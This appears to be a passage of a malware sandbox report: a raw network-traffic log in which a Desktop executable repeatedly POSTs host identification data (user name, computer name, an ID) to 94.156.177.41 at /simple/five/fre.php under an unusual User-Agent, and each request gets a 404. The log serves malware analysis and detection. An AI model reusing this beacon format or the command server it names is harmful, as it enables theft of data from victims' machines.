                            Dec 9, 2024 08:51:43.494160891 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:51:44.928045988 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:51:44 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.64971294.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:51:45.197715998 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:51:45.316993952 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:51:46.616503954 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:51:46 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.64971394.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:51:46.878506899 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:51:46.997946024 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:51:48.439110041 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:51:48 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.64971594.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:51:48.705818892 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:51:48.825174093 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:51:50.109545946 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:51:49 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            6192.168.2.64972194.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:51:50.380800962 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:51:50.500277996 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:51:52.321990013 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:51:52 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            7192.168.2.64972694.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:51:52.590128899 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:51:52.709647894 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:51:53.985956907 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:51:53 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            8192.168.2.64973294.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:51:54.252533913 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:51:54.371881008 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:51:55.804064035 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:51:55 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            9192.168.2.64973694.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:51:56.067589998 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:51:56.186858892 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:00.480139971 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:00 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            10192.168.2.64975594.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:00.754667044 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:00.874032021 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:02.310697079 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:02 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            11192.168.2.64975794.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:02.804815054 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:02.924151897 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:07.215265989 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:06 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            12192.168.2.64977394.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:07.474473000 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:07.593801975 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:09.028433084 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:08 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            13192.168.2.64977594.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:09.287523031 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:09.406949043 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:10.848207951 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:10 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            14192.168.2.64978194.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:11.112812042 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:11.232352972 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:13.029788017 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:12 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            15192.168.2.64978794.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:13.303529024 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:13.423060894 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:15.246920109 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:15 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            16192.168.2.64979394.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:15.562992096 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:15.682605028 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:16.935839891 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:16 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            17192.168.2.64979994.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:17.204816103 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:17.325150013 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:21.764257908 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:21 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            18192.168.2.64981194.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:22.035048008 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:22.154447079 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:23.587380886 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:23 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            19192.168.2.64981894.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:23.852942944 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:23.972500086 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:25.264223099 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:25 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            20192.168.2.64982394.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:25.533881903 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:25.653268099 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:27.091386080 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:26 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            21192.168.2.64982894.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:27.501702070 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:27.621177912 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:28.905251026 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:28 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            22192.168.2.64983394.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:29.190929890 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:29.310465097 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:30.743460894 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:30 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
